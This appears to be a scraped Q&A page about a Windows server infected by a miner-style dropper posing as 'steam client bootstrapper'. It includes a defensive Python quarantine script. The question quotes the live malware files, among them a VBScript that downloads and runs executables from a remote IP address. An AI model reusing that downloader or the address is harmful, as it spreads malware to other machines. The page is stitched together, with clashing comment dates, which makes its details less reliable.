How to permanently kill steam client bootstrapper

I want to share a workaround that I found for my problem.

As a programmer, I've created a program that constantly monitors the folder c:\ProgramData\ for any new files. And if some of the files that belong to "steam client bootstrapper" appear inside that folder, my program deletes those files before they are executed. If anybody needs to modify this utility, you can find it on GitHub.

After I've executed this primitive antivirus (actually anti-PUP), my system stopped being slow. One more detail that is required for this program to work stably is the requirement to create the folder c:\ProgramData\copyForVirus\. I've made the program create a copy of those virus files in order to analyze them later in some VMware environment to see what the internals of those files are.

Yuriy Zaletskyy

Updated on September 18, 2022
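The answer describes the workaround only in prose and the author's GitHub utility is not reproduced on this page. The following is an added example, written for this page and not the author's code, of the same idea: a polling sweep of a folder that copies any file whose name is on the dropper's own list (taken from the m.bat quoted in the question, plus the names the 4.vbs saves its downloads under) into a copyForVirus quarantine folder and then deletes the original. Polling instead of filesystem notifications, the quarantine file naming, the SHA-256 for later triage, and the `demo()` temp-directory scenario are all assumptions of this example; on the affected host it would be run elevated against C:\ProgramData.

```python
"""Quarantine-and-delete sweep for the ProgramData dropper described above (added example)."""
import hashlib
import shutil
import tempfile
import time
from pathlib import Path

# Names taken from the m.bat quoted in the question (the dropper's own
# kill/delete list), the three files found beside it, and the names the 4.vbs
# saves its downloads under. Compared case-insensitively because NTFS is.
KNOWN_BAD_NAMES = frozenset(n.lower() for n in (
    "secury.exe", "kingsoft.exe", "expl0rer.exe", "ieplare.exe", "nssm.exe",
    "MSASCui.exe", "SystemSettlngs.exe", "SystemSetting.exe", "Process.exe",
    "winlnlt.exe", "WindowsUpgrade.exe", "msdc.exe", "Fiddlere.exe",
    "shovst.exe", "lqrtqe.exe", "apkls.exe", "winlog.exe", "svchosts.exe",
    "win1ogins.exe", "shovsts.exe", "fcty.exe", "pool.exe", "pool2.exe",
    "pool3.exe", "s2.exe", "m.bat", "b.exe", "4.vbs",
))


def sha256_of(path: Path) -> str:
    """Hash in chunks so a large dropper does not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def quarantine_file(src: Path, quarantine: Path) -> str:
    """Copy src into the quarantine folder under a non-executable name, then
    delete the original. Returns the SHA-256 of the copy (an IoC for triage)."""
    digest = sha256_of(src)
    dest = quarantine / f"{src.name}.{digest[:16]}.quarantined"
    shutil.copy2(src, dest)
    try:
        src.unlink()
    except PermissionError:
        # On Windows a running executable cannot be unlinked; the copy is kept
        # and the next sweep retries after the process has been stopped.
        pass
    return digest


def sweep_once(watched: Path, quarantine: Path) -> dict:
    """One pass over `watched`: {filename: sha256} for every known-bad file."""
    quarantine.mkdir(parents=True, exist_ok=True)
    results = {}
    for entry in watched.iterdir():
        if entry.is_file() and entry.name.lower() in KNOWN_BAD_NAMES:
            results[entry.name] = quarantine_file(entry, quarantine)
    return results


def watch(watched: Path, quarantine: Path, interval: float = 0.5, rounds: int = 0) -> None:
    """Poll the folder (forever when rounds == 0) and report each quarantined file."""
    done = 0
    while rounds == 0 or done < rounds:
        for name, digest in sweep_once(watched, quarantine).items():
            print(f"quarantined {name} sha256={digest}")
        done += 1
        time.sleep(interval)


def demo() -> dict:
    """Constructed scenario in a temp dir: one dropper name beside one benign file."""
    root = Path(tempfile.mkdtemp(prefix="programdata_"))
    (root / "kingsoft.exe").write_bytes(b"MZ constructed sample, not real malware")
    (root / "notes.txt").write_bytes(b"benign")
    quarantine = root / "copyForVirus"
    hits = sweep_once(root, quarantine)
    return {
        "hits": hits,
        "bad_still_present": (root / "kingsoft.exe").exists(),
        "benign_still_present": (root / "notes.txt").exists(),
        "quarantined_copies": sorted(p.name for p in quarantine.iterdir()),
    }


if __name__ == "__main__":
    # On the affected host (elevated) the call would be:
    # watch(Path(r"C:\ProgramData"), Path(r"C:\ProgramData\copyForVirus"))
    print(demo())
```

The quarantined copy gets a `.quarantined` suffix so nothing will run it by double-click or by the dropper's own `Run` call, and the hash in its name deduplicates repeated drops of the same payload. Note that this only treats the symptom: as the comments below point out, the host should still be considered compromised until it is rebuilt.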

Comments

  • Yuriy Zaletskyy (almost 2 years)

    I have the following situation in my task manager:

    Task Manager - Processes

    I don't know what kind of app it is, but definitely not Steam client bootstrapper because I didn't install it and also can't uninstall it.

    If I try to figure out what kind of app it is via this step:

    Task Manager - Go to details

    I see something like this:

    Task Manager - Details

    In the MSConfig utility, I didn't find anything that looks like secury.exe.

    When I open the file location, I see three files:

    m.bat, b.exe, 4.vbs.

    Below goes the content of m.bat:

    taskkill /f /t /im secury.exe
    c:\ProgramData\secury.exe
    taskkill /f /t /im kingsoft.exe
    taskkill /f /t /im expl0rer.exe
    taskkill /f /t /im ieplare.exev
    taskkill /f /t /im nssm.exe
    taskkill /f /t /im MSASCui.exe
    taskkill /f /t /im SystemSettlngs.exe
    taskkill /f /t /im SystemSetting.exe
    taskkill /f /t /im Process.exe
    taskkill /f /t /im winlnlt.exe
    taskkill /f /t /im WindowsUpgrade.exe
    taskkill /f /t /im msdc.exe
    taskkill /f /t /im Fiddlere.exe
    taskkill /f /t /im shovst.exe
    taskkill /f /t /im lqrtqe.exe
    taskkill /f /t /im apkls.exe
    taskkill /f /t /im winlog.exe
    taskkill /f /t /im svchosts.exe
    taskkill /f /t /im win1ogins.exe
    taskkill /f /t /im shovsts.exe
    taskkill /f /t /im fcty.exe
    taskkill /f /t /im soiuos.exe
    taskkill /f /t /im TrustedInstaller.exe
    del C:\Windows\System32\soiuos.exe
    del C:\Windows\Setup\TrustedInstaller.exe
    del C:\ProgramData\kingsoft.exe
    del C:\ProgramData\expl0rer.exe
    del C:\ProgramData\ieplare.exe
    del C:\ProgramData\nssm.exe
    del C:\ProgramData\MSASCui.exe
    del C:\ProgramData\SystemSettlngs.exe
    del C:\ProgramData\SystemSetting.exe
    del C:\ProgramData\Process.exe
    del C:\ProgramData\winlnlt.exe
    del C:\ProgramData\WindowsUpgrade.exe
    del C:\ProgramData\msdc.exe
    del C:\ProgramData\Fiddlere.exe
    del C:\ProgramData\shovst.exe
    del C:\ProgramData\lqrtqe.exe
    del C:\ProgramData\apkls.exe
    del C:\ProgramData\winlog.exe
    del C:\ProgramData\svchosts.exe
    del C:\ProgramData\win1ogins.exe
    del C:\ProgramData\shovsts.exe
    del C:\ProgramData\fcty.exe
    del C:\ProgramData\pool.exe
    del C:\ProgramData\pool2.exe
    del C:\ProgramData\pool3.exe
    

    Next goes 4.vbs:

    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "GET","http://223.68.209.7:65510/2.exe",0
    xPost.Send()
    Set sGet = CreateObject("ADODB.Stream")
    sGet.Mode = 3
    sGet.Type = 1
    sGet.Open()
    sGet.Write(xPost.responseBody)
    sGet.SaveToFile "c:\ProgramData\s2.exe",2
    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0
    xPost.Send()
    Set sGet = CreateObject("ADODB.Stream")
    sGet.Mode = 3
    sGet.Type = 1
    sGet.Open()
    sGet.Write(xPost.responseBody)
    sGet.SaveToFile "c:\ProgramData\pool2.exe",2
    CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe"
    CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"
    

    What can I do in order to stop secury.exe from abusing the computing power of my server?

    P.S. I've executed Avast full check of my computer, but it didn't find anything wrong.

    • Admin (over 6 years)
      That... looks awfully suspicious (the content of those batch files and the VBS). Any chance of you going into safe mode (and hopefully that thing is not running) and then you can try to delete them? If safe mode is not an option - boot from an external drive (or Linux LiveUSB/LiveCD) and with the HDD accessible - delete those files?
    • Admin (over 6 years)
      At this point you should assume that your computer has been completely compromised. You could run a number of virus checkers and pray that they've worked - but I'd recommend backing up everything of importance and then formatting and reinstalling Windows.
    • Admin (over 6 years)
      I deleted those files many times, but it didn't work